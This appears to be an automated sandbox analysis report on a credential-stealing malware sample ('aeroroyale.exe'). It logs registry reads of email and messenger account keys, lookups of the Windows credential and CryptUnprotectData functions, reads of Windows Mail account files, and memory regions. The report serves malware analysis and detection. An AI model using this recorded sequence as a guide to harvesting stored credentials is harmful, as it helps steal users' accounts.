| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x75cd71c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x75c9b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x75cd7941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x75cd7381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x75cd7481 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337} |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}, value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 112, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 112, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 112, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 112, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, type = REG_BINARY |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, type = REG_BINARY |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, type = REG_BINARY |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, type = REG_BINARY |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, type = REG_BINARY |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 103, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\fcc54e287a017c4094152f1c67fbc03d |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\fcc54e287a017c4094152f1c67fbc03d |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x75cd71c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x75c9b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x75cd7941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x75cd7381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x75cd7481 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x75ac5a7f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x75cd71c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x75c9b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x75cd7941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x75cd7381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x75cd7481 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount, size = 1734, size_out = 1734 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount, size = 1506, size_out = 1506 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount, size = 670, size_out = 670 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 8 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 5 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 2 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 4 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 6 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 7 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 5 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, size = 2 |
|
1 |
Process #10: aeroroyale.exe
50
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D4C
0x
D6C
0x
D70
0x
D74
0x
D78
0x
D7C
0x
D80
0x
D84
0x
D88
0x
D8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00291fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x003c0000 | 0x003c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | - |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x0114ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x01150000 | 0x011abfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01152fff | Pagefile Backed Memory | rw |
|
|
|
- |
| tzres.dll | 0x01150000 | 0x01150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001160000 | 0x01160000 | 0x01161fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001160000 | 0x01160000 | 0x01166fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x01170fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x01171fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001180000 | 0x01180000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x011c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x011d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011f0000 | 0x011f0000 | 0x011f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01210000 | 0x014defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000014e0000 | 0x014e0000 | 0x016bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x015befff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000015c0000 | 0x015c0000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x01643fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001650000 | 0x01650000 | 0x01650fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001660000 | 0x01660000 | 0x01660fff | Pagefile Backed Memory | r |
|
|
|
- |
